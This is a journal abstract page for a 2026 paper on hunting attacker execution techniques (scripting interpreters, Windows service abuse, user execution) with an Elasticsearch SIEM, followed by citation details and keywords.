Threat hunting the silent killers - behavior-based execution attacks

https://doi.org/10.55214/2576-8484.v10i1.11606

Authors

  • Akashdeep Bhardwaj Centre for Cybersecurity, School of Computer Science UPES, Dehradun, India.

Attack methods that produce adversarial-controlled code and scripts executing on a local or remote server are referred to as execution. Malicious code-running techniques are combined with techniques from other approaches to accomplish more general objectives, such as data theft or network infrastructure reconnaissance. Adversaries execute a PowerShell script to conduct remote system discovery using remote access tools. In this research, the authors focus on three unique threat hunting methods of execution. The first hunt method is the use of a command scripting interpreter, where adversaries execute commands, scripts, or binaries using a variety of interfaces and languages. The second technique for hunting is focused on the execution of system services, where adversaries exploit the Windows Service Control Manager to run malicious payloads and commands. The last method of hunting for harmful files is called "user execution," in which attackers tempt a victim to open a malicious file to acquire execution. The authors implemented Elasticsearch Security Incident and Event Management (SIEM) systems to ingest logs gathered from various sources and perform Kibana, Lucene, and domain-specific language searches for the threat hunts.

How to Cite

Bhardwaj, A. (2026). Threat hunting the silent killers - behavior-based execution attacks. Edelweiss Applied Science and Technology, 10(1), 208–231. https://doi.org/10.55214/2576-8484.v10i1.11606
ACM APA Chicago MLA
Download Citation
Endnote/Zotero/Mendeley (RIS) BibTeX

Downloads

Download data is not yet available.

Dimension Badge

Download

Downloads

Issue

Vol. 10 No. 1 (2026)

Section

Articles

Published

2026-01-01

Keywords

Command & control, Elasticsearch, Execution, SIEM, Threat hunting.